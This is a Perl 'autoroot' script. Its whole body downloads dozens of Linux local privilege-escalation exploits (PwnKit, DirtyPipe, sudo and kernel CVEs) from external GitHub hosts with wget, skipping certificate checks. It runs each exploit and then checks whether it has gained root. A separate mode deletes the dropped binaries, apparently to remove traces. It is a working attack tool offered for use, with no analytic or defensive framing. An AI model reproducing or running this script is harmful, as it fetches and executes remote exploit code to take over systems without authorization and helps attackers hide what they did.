#!/usr/bin/perl
print "#=[+]====================================================[+]=#\n";
print "|              Autoroot By Gyokka                            |\n";
print "|          Use for root : perl auto.pl root                  |\n";
print "|     Use for Delete All Localroot : perl auto.pl del        |\n";
print "#============================================================#\n";
if ($ARGV[0] =~ "root" ) 
{
print ("Run PWNKIT!!! \n");
print("If Stuck Using CTRL + C For Skipping...\n");
system("wget https://github.com/TokuHaxor/LocalRoot/raw/main/pwnkit -O pwnkit --no-check-certificate -q");
system("chmod +x pwnkit");
system("./pwnkit");
system("id;whoami");
print("\n");
print ("Run LPE.sh!!! \n");
print("If Stuck Using CTRL + C For Skipping...\n");
system("wget https://raw.githubusercontent.com/TokuHaxor/LocalRoot/main/lpe.sh -O lpe.sh --no-check-certificate -q");
system("chmod +x lpe.sh");
system("./lpe.sh");
system("id;whoami");
print("\n");
print ("Run DIRTYPIPE!!! \n");
print("If Stuck Using CTRL + C For Skipping...\n");
system("wget https://github.com/TokuHaxor/LocalRoot/raw/main/dirtypipe -O dirtypipe --no-check-certificate -q");
system("chmod +x dirtypipe");
system("find / -perm -4000 2>/dev/null");
system("./dirtypipe /usr/bin/sudo");
system("id;whoami");
print("\n");
print ("Run PTRACE!!! \n");
print("If Stuck Using CTRL + C For Skipping...\n");
system("wget https://0-gram.github.io/id-0/ptrace -O ptrace --no-check-certificate -q");
system("chmod +x ptrace");
system("./ptrace");
system("id;whoami");
print("\n");
print ("Run a2.out!!! \n");
print("If Stuck Using CTRL + C For Skipping...\n");
system("wget https://0-gram.github.io/id-0/CVE-2022-0847-DirtyPipe-Exploits/a2.out -O a2.out --no-check-certificate -q");
system("chmod +x a2.out");
system("find / -perm 4000 -type -f 2>/dev/null || find / -perm -u=s -type -f 2>/dev/null");
system("./a2.out /usr/bin/sudo");
system("./a2.out /usr/bin/passwd");
system("id;whoami");
print("\n");
print ("Run SUDODIRTYPIPE!!! \n");
print("If Stuck Using CTRL + C For Skipping...\n");
system("wget https://0-gram.github.io/id-0/sudodirtypipe -O sudodirtypipe --no-check-certificate -q");
system("chmod +x sudodirtypipe");
system("./sudodirtypipe /usr/local/bin");
system("id;whoami");
print("\n");
print ("Run AF_PACKET!!! \n");
print("If Stuck Using CTRL + C For Skipping...\n");
system("wget https://0-gram.github.io/id-0/af_packet -O af_packet --no-check-certificate -q");
system("chmod +x af_packet");
system("./af_packet");
system("id;whoami");
print("\n");
print ("Run CVE-2015-1328!!! \n");
print("If Stuck Using CTRL + C For Skipping...\n");
system("wget https://0-gram.github.io/id-0/CVE-2015-1328 -O CVE-2015-1328 --no-check-certificate -q");
system("chmod +x CVE-2015-1328");
system("./CVE-2015-1328");
system("id;whoami");
print("\n");
print ("Run CVE-2017-16995!!! \n");
print("If Stuck Using CTRL + C For Skipping...\n");
system("wget https://0-gram.github.io/id-0/cve-2017-16995 -O cve-2017-16995 --no-check-certificate -q");
system("chmod +x cve-2017-16995");
system("./cve-2017-16995");
system("id;whoami");
print("\n");
print ("Run EXPLOITE-DEBIAN!!! \n");
print("If Stuck Using CTRL + C For Skipping...\n");
system("wget https://0-gram.github.io/id-0/exploit-debian -O exploit-debian --no-check-certificate -q");
system("chmod +x exploit-debian");
system("./exploit-debian");
system("id;whoami");
print("\n");
print ("Run EXPLOIT-UBUNTU!!! \n");
print("If Stuck Using CTRL + C For Skipping...\n");
system("wget https://0-gram.github.io/id-0/exploit-ubuntu -O exploit-ubuntu --no-check-certificate -q");
system("chmod +x exploit-ubuntu");
system("./exploit-ubuntu");
system("id;whoami");
print("\n");
print ("Run NEWPID!!! \n");
print("If Stuck Using CTRL + C For Skipping...\n");
system("wget https://0-gram.github.io/id-0/newpid -O newpid --no-check-certificate -q");
system("chmod +x newpid");
system("./newpid");
system("id;whoami");
print("\n");
print ("Run RACEABRT!!! \n");
print("If Stuck Using CTRL + C For Skipping...\n");
system("wget https://0-gram.github.io/id-0/raceabrt -O raceabrt --no-check-certificate -q");
system("chmod +x raceabrt");
system("./raceabrt");
system("id;whoami");
print("\n");
print ("Run TIMEOUTPWN!!! \n");
print("If Stuck Using CTRL + C For Skipping...\n");
system("wget https://0-gram.github.io/id-0/timeoutpwn -O timeoutpwn --no-check-certificate -q");
system("chmod +x timeoutpwn");
system("./timeoutpwn");
system("id;whoami");
print("\n");
print ("Run UPSTREAM44!!! \n");
print("If Stuck Using CTRL + C For Skipping...\n");
system("wget https://0-gram.github.io/id-0/upstream44 -O upstream44 --no-check-certificate -q");
system("chmod +x upstream44");
system("./upstream44");
system("id;whoami");
print("\n");
print ("Run a.out!!! \n");
print("If Stuck Using CTRL + C For Skipping...\n");
system("wget https://0-gram.github.io/id-0/a.out -O a.out --no-check-certificate -q");
system("chmod +x a.out");
system("./a.out 0 && ./a.out 1");
system("id;whoami");
print("\n");
print ("Run linux_sudo_cve-2017-1000367!!! \n");
print("If Stuck Using CTRL + C For Skipping...\n");
system("wget https://0-gram.github.io/id-0/linux_sudo_cve-2017-1000367 -O linux_sudo_cve-2017-1000367 --no-check-certificate -q");
system("chmod +x linux_sudo_cve-2017-1000367");
system("./linux_sudo_cve-2017-1000367");
system("id;whoami");
print("\n");
print ("Run CVE-2017-7308!!! \n");
print("If Stuck Using CTRL + C For Skipping...\n");
system("wget https://0-gram.github.io/id-0/CVE-2017-7308 -O CVE-2017-7308 --no-check-certificate -q");
system("chmod +x CVE-2017-7308");
system("./CVE-2017-7308");
system("id;whoami");
print("\n");
print ("Run CVE-2022-2639!!! \n");
print("If Stuck Using CTRL + C For Skipping...\n");
system("wget https://0-gram.github.io/id-0/CVE-2022-2639 -O CVE-2022-2639 --no-check-certificate -q");
system("chmod +x CVE-2022-2639");
system("./CVE-2022-2639");
system("id;whoami");
print("\n");
print ("Run POLKIT-PWNAGE!!! \n");
print("If Stuck Using CTRL + C For Skipping...\n");
system("wget https://0-gram.github.io/id-0/polkit-pwnage -O polkit-pwnage --no-check-certificate -q");
system("chmod +x polkit-pwnage");
system("./polkit-pwnage");
system("id;whoami");
print("\n");
print ("Run -RATIONALLOVE!!! \n");
print("If Stuck Using CTRL + C For Skipping...\n");
system("wget https://0-gram.github.io/id-0/RationalLove -O RationalLove --no-check-certificate -q");
system("chmod +x RationalLove");
system("./RationalLove");
system("id;whoami");
print("\n");
print ("Run exploit_userspec.py!!! \n");
print("If Stuck Using CTRL + C For Skipping...\n");
system("wget https://0-gram.github.io/id-0/exploit_userspec.py -O exploit_userspec.py --no-check-certificate -q");
system("chmod +x exploit_userspec.py");
system("python2 exploit_userspec.py");
system("id;whoami");
print("\n");
print ("Run cve-2021-4034-poc!!! \n");
print("If Stuck Using CTRL + C For Skipping...\n");
system("wget https://github.com/tanmyid/localroot/raw/master/cve-2021-4034-poc -O cve-2021-4034-poc --no-check-certificate -q");
system("chmod +x cve-2021-4034-poc");
system("./cve-2021-4034-poc");
system("id;whoami");
print("\n");
print ("Run CVE-2022-32250!!!\n");
print("If Stuck Using CTRL + C For Skipping...\n");
system("wget https://github.com/TokuHaxor/LocalRoot/raw/main/exp -O exp --no-check-certificate -q");
system("chmod +x exp");
system("./exp");
system("id;whoami");
print("\n");
print ("Run CVE-2022-0995!!!\n");
print("If Stuck Using CTRL + C For Skipping...\n");
system("wget https://github.com/TokuHaxor/LocalRoot/raw/main/exploit -O cve2022 --no-check-certificate -q");
system("chmod +x cve2022");
system("./cve2022");
system("id;whoami");
print("\n");
print ("Run CVE-2023!!!\n");
print("If Stuck Using CTRL + C For Skipping...\n");
system("wget https://github.com/TokuHaxor/LocalRoot/raw/main/cve2023 -O cve2023 --no-check-certificate -q");
system("chmod +x cve2023");
system("./cve2023");
system("id;whoami");
print("\n");
print ("Run CVE-2023-32233!!!\n");
print("If Stuck Using CTRL + C For Skipping...\n");
system("wget https://github.com/0-Gram/id-0/raw/main/CVE-2023-32233 -O CVE-2023-32233 --no-check-certificate -q");
system("chmod +x CVE-2023-32233");
system("./CVE-2023-32233");
system("id;whoami");
print("\n");
print ("Run CVE-2022-23222!!!\n");
print("If Stuck Using CTRL + C For Skipping...\n");
system("wget https://github.com/TokuHaxor/LocalRoot/raw/main/CVE-2022-23222 -O cve2022-23222 --no-check-certificate -q");
system("chmod +x cve2022-23222");
system("./cve2022-23222");
system("id;whoami");
print("\n");
print ("Run EXP_FILE_CREDENTIAL!!! \n");
print("If Stuck Using CTRL + C For Skipping...\n");
system("wget https://0-gram.github.io/id-0/exp_file_credential -O exp_file_credential --no-check-certificate -q");
system("chmod +x exp_file_credential");
system("./exp_file_credential");
system("id;whoami");
system("su user");
print("\n");
print("\n");
print ("Run CVE-2022-0185-exp1!!!\n");
print("If Stuck Using CTRL + C For Skipping...\n");
system("wget https://github.com/TokuHaxor/LocalRoot/raw/main/CVE-2022-0185-exp1 -O CVE-2022-0185-exp1 --no-check-certificate -q");
system("chmod +x CVE-2022-0185-exp1");
system("./CVE-2022-0185-exp1");
system("id;whoami");
print("\n");
print ("Run CVE-2022-0185-exp2!!!\n");
print("If Stuck Using CTRL + C For Skipping...\n");
system("wget https://github.com/TokuHaxor/LocalRoot/raw/main/CVE-2022-0185-exp2 -O CVE-2022-0185-exp2 --no-check-certificate -q");
system("chmod +x CVE-2022-0185-exp2");
system("./CVE-2022-0185-exp2");
system("id;whoami");
print("\n");
print ("Run CVE-2022-0847-exp2!!!\n");
print("If Stuck Using CTRL + C For Skipping...\n");
system("wget https://github.com/TokuHaxor/LocalRoot/raw/main/CVE-2022-0847-exp2 -O CVE-2022-0847-exp2 --no-check-certificate -q");
system("chmod +x CVE-2022-0847-exp2");
system("./CVE-2022-0847-exp2");
system("id;whoami");
print("\n");
print ("Run CVE-2022-0847-exp3!!!\n");
print("If Stuck Using CTRL + C For Skipping...\n");
system("wget https://github.com/TokuHaxor/LocalRoot/raw/main/CVE-2022-0847-exp3 -O CVE-2022-0847-exp3 --no-check-certificate -q");
system("chmod +x CVE-2022-0847-exp3");
system("./CVE-2022-0847-exp3");
system("id;whoami");
print("\n");
print ("Run CVE-2022-25636-exp2!!!\n");
print("If Stuck Using CTRL + C For Skipping...\n");
system("wget https://github.com/TokuHaxor/LocalRoot/raw/main/CVE-2022-25636-exp2 -O CVE-2022-25636-exp2 --no-check-certificate -q");
system("chmod +x CVE-2022-25636-exp2");
system("./CVE-2022-25636-exp2");
system("id;whoami");
print("\n");
print ("Run CVE-2022-34918-exp1!!!\n");
print("If Stuck Using CTRL + C For Skipping...\n");
system("wget https://github.com/TokuHaxor/LocalRoot/raw/main/CVE-2022-34918-exp1 -O CVE-2022-34918-exp1 --no-check-certificate -q");
system("chmod +x CVE-2022-34918-exp1");
system("./CVE-2022-34918-exp1");
system("id;whoami");
print("\n");
print ("Run CVE-2022-34918-exp2!!!\n");
print("If Stuck Using CTRL + C For Skipping...\n");
system("wget https://github.com/TokuHaxor/LocalRoot/raw/main/CVE-2022-34918-exp2 -O CVE-2022-34918-exp2 --no-check-certificate -q");
system("chmod +x CVE-2022-34918-exp2");
system("./CVE-2022-34918-exp2");
system("id;whoami");
print("\n");
print ("Run CVE-2021-22555-exp1!!!\n");
print("If Stuck Using CTRL + C For Skipping...\n");
system("wget https://github.com/TokuHaxor/LocalRoot/raw/main/CVE-2021-22555-exp1 -O CVE-2021-22555-exp1 --no-check-certificate -q");
system("chmod +x CVE-2021-22555-exp1");
system("./CVE-2021-22555-exp1");
system("id;whoami");
print("\n");
print ("Run CVE-2021-22555-exp2!!!\n");
print("If Stuck Using CTRL + C For Skipping...\n");
system("wget https://github.com/TokuHaxor/LocalRoot/raw/main/CVE-2021-22555-exp2 -O CVE-2021-22555-exp2 --no-check-certificate -q");
system("chmod +x CVE-2021-22555-exp2");
system("./CVE-2021-22555-exp2");
system("id;whoami");
print("\n");
print("\n");
print ("Run CVE-2021-27365!!!\n");
print("If Stuck Using CTRL + C For Skipping...\n");
system("wget https://github.com/TokuHaxor/LocalRoot/raw/main/CVE-2021-27365 -O CVE-2021-27365 --no-check-certificate -q");
system("chmod +x CVE-2021-27365");
system("./CVE-2021-27365");
system("id;whoami");
print("\n");
print ("Run CVE-2021-3156!!!\n");
print("If Stuck Using CTRL + C For Skipping...\n");
system("wget https://github.com/TokuHaxor/LocalRoot/raw/main/CVE-2021-3156 -O CVE-2021-3156 --no-check-certificate -q");
system("chmod +x CVE-2021-3156");
system("./CVE-2021-3156");
system("id;whoami");
print("\n");
print ("Run CVE-2021-3493!!!\n");
print("If Stuck Using CTRL + C For Skipping...\n");
system("wget https://github.com/TokuHaxor/LocalRoot/raw/main/CVE-2021-3493 -O CVE-2021-3493 --no-check-certificate -q");
system("chmod +x CVE-2021-3493");
system("./CVE-2021-3493");
system("id;whoami");
print("\n");
print ("Run CVE-2021-3493!!!\n");
print("If Stuck Using CTRL + C For Skipping...\n");
system("wget https://github.com/TokuHaxor/LocalRoot/raw/main/CVE-2021-4034 -O CVE-2021-4034 --no-check-certificate -q");
system("chmod +x CVE-2021-4034");
system("./CVE-2021-4034");
system("id;whoami");
print("\n");
print ("Run CVE-2021-4154-exp1!!!\n");
print("If Stuck Using CTRL + C For Skipping...\n");
system("wget https://github.com/TokuHaxor/LocalRoot/raw/main/CVE-2021-4154-exp1 -O CVE-2021-4154-exp1 --no-check-certificate -q");
system("chmod +x CVE-2021-4154-exp1");
system("./CVE-2021-4154-exp1");
system("id;whoami");
print("\n");
print ("Run CVE-2021-4154-exp2!!!\n");
print("If Stuck Using CTRL + C For Skipping...\n");
system("wget https://github.com/TokuHaxor/LocalRoot/raw/main/CVE-2021-4154-exp2 -O CVE-2021-4154-exp2 --no-check-certificate -q");
system("chmod +x CVE-2021-4154-exp2");
system("./CVE-2021-4154-exp2");
system("id;whoami");
print("\n");
print ("Run CVE-2021-43267!!!\n");
print("If Stuck Using CTRL + C For Skipping...\n");
system("wget https://github.com/TokuHaxor/LocalRoot/raw/main/CVE-2021-43267 -O CVE-2021-43267 --no-check-certificate -q");
system("chmod +x CVE-2021-43267");
system("./CVE-2021-43267");
system("id;whoami");
print("\n");
print ("Run OVERLAYS!!! \n");
print("If Stuck Using CTRL + C For Skipping...\n");
system("wget https://github.com/TokuHaxor/LocalRoot/raw/main/overlayfs -O overlays --no-check-certificate -q");
system("chmod +x overlays");
system("./overlays");
system("id;whoami");
print("\n");

print "If u get root stop it with ctrl+c\n";
print "get root...???\n";

}
if ($ARGV[0] =~ "del" ) 
{
system("rm pwnkit");
system("rm overlays");
system("rm lpe.sh");
system("rm exp");
system("rm CVE-2022-0185-exp1");
system("rm CVE-2021-43267");
system("rm CVE-2023-32233");
system("rm CVE-2021-4154-exp2");
system("rm CVE-2021-4034");
system("rm CVE-2021-3493");
system("rm CVE-2021-3156");
system("rm CVE-2021-27365");
system("rm CVE-2021-22555-exp2");
system("rm CVE-2021-22555-exp1");
system("rm CVE-2022-34918-exp2");
system("rm CVE-2022-25636-exp2");
system("rm CVE-2022-0847-exp3");
system("rm CVE-2022-0847-exp2");
system("rm CVE-2022-0185-exp2");
system("rm CVE-2021-4154-exp1");
system("rm CVE-2022-34918-exp1");
system("rm cve2022");
system("rm cve2022-23222");
system("rm cve2023");
system("rm poc");
system("rm dirtypipe");
system("rm cve-2021-4034-poc");
system("rm exp_file_credential");
system("rm -f pwnkit");
system("rm -rf GCONV_PATH=.");
system("rm -rf .pkexec");
system("rm -f ptrace");
system("rm -f a2.out");
system("rm -rf ovlcap");
system("rm -rf exp_dir");
system("rm sudodirtypipe");
system("rm af_packet");
system("rm CVE-2015-1328");
system("rm cve-2017-16995");
system("rm exploit-debian");
system("rm exploit-ubuntu");
system("rm newpid");
system("rm raceabrt");
system("rm timeoutpwn");
system("rm upstream44");
system("rm a.out");
system("rm linux_sudo_cve-2017-1000367");
system("rm CVE-2017-7308");
system("rm CVE-2022-2639");
system("rm polkit-pwnage");
system("rm RationalLove");
system("rm exploit_userspec.py");
system("rm 0");
system("rm kmem");
system("rm sendfile1");
print "#=[+]==========================================[+]=#\n";
print "|             Thanks For Using it                  |\n";
print "#=[+]==========================================[+]=#\n";

}